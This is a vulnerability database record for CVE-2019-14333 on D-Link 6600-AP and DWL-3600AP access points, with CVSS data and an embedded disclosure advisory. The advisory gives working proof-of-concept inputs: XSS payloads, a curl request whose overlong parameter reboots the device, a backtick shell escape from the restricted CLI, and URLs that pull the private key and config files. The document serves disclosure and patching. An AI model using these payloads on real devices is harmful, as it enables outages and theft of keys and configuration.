ID

VAR-201908-0911


CVE

CVE-2019-14333


TITLE

Input validation vulnerability on D-Link 6600-AP and DWL-3600AP devices

Trust: 0.8

sources: JVNDB: JVNDB-2019-007261

DESCRIPTION

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. D-Link 6600-AP and DWL-3600AP devices contain an input validation vulnerability. The device may be put into a service operation interruption (DoS) state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot.

# Security Advisory - 22/07/2019

## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14).

D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as described on the D-Link website. Note that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk.

Code base shared with DWL-3600AP and DWL-8610AP

### This advisory is sent to D-Link the 22/05/2019

Many Thanks to the D-Link Security Team for their prompt reactivity!

### Affected Product

D-Link 6600-AP, DWL-3600AP
+ Vulnerability number 2 affects also DWL-8610AP

### Firmware version

4.2.0.14 Revision Ax date: 21/03/2019

### Last version available

https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

### Product Identifier

WLAN-EAP

### Hardware Version

A2

### Manufacturer

D-LINK

## Product Description

The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network.

Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

## List of Vulnerabilities

1. CVE-2019-14338 - Post-authenticated XSS
2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
3. CVE-2019-14337 - Escape shell in the restricted command line interface
5. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
7. CVE-2019-14332 - Use of weak ciphers for SSH

### 1. Post-authenticated XSS

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14338
#### Proof-of concept

Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>

### 2. Post-authenticated Certificate and RSA Private Key extraction through http command

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14334
#### Proof-of concept

http://10.90.90.91/sslcert-get.cgi?

Result of the command: File "mini_httpd.pem" automatically extracted

### 3. Pre-authenticated Denial of service leading to the reboot of the AP

#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14333
#### Proof-of concept

    kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

### 4. Escape shell in the restricted command line interface

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14337
#### Proof-of concept

    DLINK-WLAN-AP# wget
    Invalid command.
    DLINK-WLAN-AP# `/bin/sh -c wget`
    BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.

    Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE]
        [--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
        [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL

    Retrieve files via HTTP or FTP

    Options:
        -s       Spider mode - only check file existence
        -c       Continue retrieval of aborted transfer
        -q       Quiet
        -P DIR   Save to DIR (default .)
        -T SEC   Network read timeout is SEC seconds
        -O FILE  Save to FILE ('-' for stdout)
        -U STR   Use STR for User-Agent header
        -Y       Use proxy ('on' or 'off')

    DLINK-WLAN-AP#

### 5. Post-authenticated Denial of service leading to the reboot of the AP

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14335
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=%s

### 6. Post-authenticated Dump all the config files

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14336
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=

### 7. Use of weak ciphers

#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14332
#### Proof-of concept

    root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
    The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
    RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
    admin@10.90.90.91's password:
    Enter 'help' for help.
    DLINK-WLAN-AP# help

## Report Timeline

22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.

22/06/2019 : Public release of the security advisory to mailing list

## Fixes/Updates

ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip

ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip

## About me - pwn.sandstorm@gmail.com

#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources

Trust: 2.34

sources: NVD: CVE-2019-14333 // JVNDB: JVNDB-2019-007261 // CNVD: CNVD-2019-29140 // VULHUB: VHN-146269 // PACKETSTORM: 153840

IOT TAXONOMY

category: ['Network device'] | sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2019-29140

AFFECTED PRODUCTS

vendor: dlink | model: 6600-ap | scope: eq | version: 4.2.0.14

Trust: 1.0

vendor: dlink | model: dwl-3600ap | scope: eq | version: 4.2.0.14

Trust: 1.0

vendor: d link | model: d-link 6600-ap | scope: eq | version: 4.2.0.14

Trust: 0.8

vendor: d link | model: dwl-3600ap | scope: eq | version: 4.2.0.14

Trust: 0.8

vendor: d link | model: 6600-ap | scope: - | version: -

Trust: 0.6

vendor: d link | model: dwl-3600ap | scope: - | version: -

Trust: 0.6

sources: CNVD: CNVD-2019-29140 // JVNDB: JVNDB-2019-007261 // NVD: CVE-2019-14333

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-14333
value: MEDIUM

Trust: 1.0

NVD: CVE-2019-14333
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2019-29140
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201907-1639
value: MEDIUM

Trust: 0.6

VULHUB: VHN-146269
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2019-14333
severity: MEDIUM
baseScore: 4.9
vectorString: AV:L/AC:L/AU:N/C:N/I:N/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2019-29140
severity: MEDIUM
baseScore: 4.9
vectorString: AV:L/AC:L/AU:N/C:N/I:N/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-146269
severity: MEDIUM
baseScore: 4.9
vectorString: AV:L/AC:L/AU:N/C:N/I:N/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2019-14333
baseSeverity: MEDIUM
baseScore: 5.5
vectorString: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
attackVector: LOCAL
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: HIGH
exploitabilityScore: 1.8
impactScore: 3.6
version: 3.1

Trust: 1.0

NVD: CVE-2019-14333
baseSeverity: MEDIUM
baseScore: 5.5
vectorString: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
attackVector: LOCAL
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2019-29140 // VULHUB: VHN-146269 // JVNDB: JVNDB-2019-007261 // CNNVD: CNNVD-201907-1639 // NVD: CVE-2019-14333

PROBLEMTYPE DATA

problemtype:NVD-CWE-noinfo

Trust: 1.0

problemtype:CWE-20

Trust: 0.9

sources: VULHUB: VHN-146269 // JVNDB: JVNDB-2019-007261 // NVD: CVE-2019-14333

THREAT TYPE

local

Trust: 0.6

sources: CNNVD: CNNVD-201907-1639

TYPE

input validation error

Trust: 0.6

sources: CNNVD: CNNVD-201907-1639

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-007261

PATCH

title: Security Advisory | url: https://us.dlink.com/en/security-advisory

Trust: 0.8

title: Security Bulletin | url: https://www.dlink.com/en/security-bulletin

Trust: 0.8

title: Patch for D-Link 6600-AP and DWL-3600AP Denial of Service Vulnerabilities | url: https://www.cnvd.org.cn/patchInfo/show/177599

Trust: 0.6

title: D-Link 6600-AP and DWL-3600AP Security vulnerabilities | url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95748

Trust: 0.6

sources: CNVD: CNVD-2019-29140 // JVNDB: JVNDB-2019-007261 // CNNVD: CNNVD-201907-1639

EXTERNAL IDS

db: PACKETSTORM | id: 153840

Trust: 3.2

db: NVD | id: CVE-2019-14333

Trust: 3.2

db: JVNDB | id: JVNDB-2019-007261

Trust: 0.8

db: CNNVD | id: CNNVD-201907-1639

Trust: 0.7

db: CNVD | id: CNVD-2019-29140

Trust: 0.6

db: VULHUB | id: VHN-146269

Trust: 0.1

sources: CNVD: CNVD-2019-29140 // VULHUB: VHN-146269 // JVNDB: JVNDB-2019-007261 // PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1639 // NVD: CVE-2019-14333

REFERENCES

url:http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html

Trust: 3.1

url:https://us.dlink.com/en/security-advisory

Trust: 1.7

url:https://www.dlink.com/en/security-bulletin

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2019-14333

Trust: 1.5

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14333

Trust: 0.8

url:https://nvd.nist.gov/vuln/detail/cve-2019-14336

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14332

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14335

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=%s

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=+guest<script>alert('pwned')</script>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14337

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14334

Trust: 0.1

url:http://10.90.90.91/sslcert-get.cgi?

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2019-14338

Trust: 0.1

url:https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

Trust: 0.1

url:http://10.90.90.91/admin.cgi?action=

Trust: 0.1

sources: CNVD: CNVD-2019-29140 // VULHUB: VHN-146269 // JVNDB: JVNDB-2019-007261 // PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1639 // NVD: CVE-2019-14333

CREDITS

Sandstorm Security

Trust: 0.7

sources: PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1639

SOURCES

db: CNVD | id: CNVD-2019-29140
db: VULHUB | id: VHN-146269
db: JVNDB | id: JVNDB-2019-007261
db: PACKETSTORM | id: 153840
db: CNNVD | id: CNNVD-201907-1639
db: NVD | id: CVE-2019-14333

LAST UPDATE DATE

2024-11-23T21:52:00.729000+00:00


SOURCES UPDATE DATE

db: CNVD | id: CNVD-2019-29140 | date: 2019-08-28T00:00:00
db: VULHUB | id: VHN-146269 | date: 2020-08-24T00:00:00
db: JVNDB | id: JVNDB-2019-007261 | date: 2019-08-06T00:00:00
db: CNNVD | id: CNNVD-201907-1639 | date: 2020-08-25T00:00:00
db: NVD | id: CVE-2019-14333 | date: 2024-11-21T04:26:31.713

SOURCES RELEASE DATE

db: CNVD | id: CNVD-2019-29140 | date: 2019-08-28T00:00:00
db: VULHUB | id: VHN-146269 | date: 2019-08-01T00:00:00
db: JVNDB | id: JVNDB-2019-007261 | date: 2019-08-06T00:00:00
db: PACKETSTORM | id: 153840 | date: 2019-07-31T19:01:29
db: CNNVD | id: CNNVD-201907-1639 | date: 2019-07-31T00:00:00
db: NVD | id: CVE-2019-14333 | date: 2019-08-01T13:15:14.023